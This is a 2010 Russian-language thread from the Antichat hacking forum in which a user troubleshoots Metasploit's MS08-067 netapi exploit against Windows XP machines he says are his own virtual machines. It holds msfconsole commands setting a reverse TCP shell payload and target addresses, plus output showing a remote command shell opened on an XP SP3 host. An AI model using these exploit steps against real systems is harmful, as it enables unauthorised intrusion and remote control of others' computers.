Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Metasploit (Ubuntu) не могу найти MS08-067_netapi (https://forum.antichat.xyz/showthread.php?t=209665)

Ru}{eeZ 07.06.2010 00:33

Metasploit (Ubuntu) не могу найти MS08-067_netapi
 
Собрал из исходников метасплоит на убунте, ввожу в консоль (msfconsole) выбор эксплоита, но почему-то он не находится, в чём дело? Ведь он есть в /msf3/modules/exploits/windows/smb/
Код:

msf > use MS08-067_netapi
[-] Failed to load module: MS08-067_netapi

НОВЫЙ ВОПРОС НИЖЕ!

rap1t 07.06.2010 00:44

ты сам ответил на свой вопрос
Код:

use exploit/windows/smb/ms08_067_netapi

Ru}{eeZ 07.06.2010 00:52

Цитата:

Сообщение от rap1t
ты сам ответил на свой вопрос
Код:

use exploit/windows/smb/ms08_067_netapi

спасибо большое! а я пробовал полный путь указывать)

Ru}{eeZ 07.06.2010 01:38

Новый вопрос:
Почему я не могу получить доступ к системе (поставил на вирт. машину голый Windows XP SP2 RU)? На ней нет никаких заплаток.
Код:

[*] Started reverse handler on 127.0.0.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Russian
[*] Selected Target: Windows XP SP2 Russian (NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.

До этого:
Код:

msf exploit(ms08_067_netapi) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp

msf exploit(ms08_067_netapi) > set RHOST 172.31.34.250
RHOST => 172.31.34.250

msf exploit(ms08_067_netapi) > set LHOST 127.0.0.1
LHOST => 127.0.0.1


overxor 07.06.2010 03:17

>> LHOST => 127.0.0.1
После пробива у тебя идет попытка соединения на локальный интерфейс.

Измени на ip адрес совей Ubunt'ы

Ru}{eeZ 07.06.2010 17:45

Цитата:

Сообщение от overxor
>> LHOST => 127.0.0.1
После пробива у тебя идет попытка соединения на локальный интерфейс.

Измени на ip адрес совей Ubunt'ы

Спасибо, теперь получилось)

Только вот не могу понят, пробую атаковать голую без заплаток и с выключенным брандмауэром свою XP SP2 на виртуалке, выдаёт:
Код:

msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 172.31.47.208:4444 [*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 2 - lang:Russian[*] Selected Target: Windows XP SP2 Russian (NX)[*] Attempting to trigger the vulnerability...[*] Exploit completed, but no session was created.

Атакую юзаемый Windows XP SP3 - атака проходит:
Код:

[*] Started reverse handler on 172.31.47.208:4444 [*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 3 - lang:Russian[*] Selected Target: Windows XP SP3 Russian (NX)[*] Attempting to trigger the vulnerability...[*] Command shell session 1 opened (172.31.47.208:4444 -> 172.31.47.196:2658) at Mon Jun 07 14:39:12 +0400 2010

Microsoft Windows XP [������ 5.1.2600]
(�) ��௮����� ����������, 1985-2001.

C:\WINDOWS\system32>

Почему так может быть?


Время: 07:46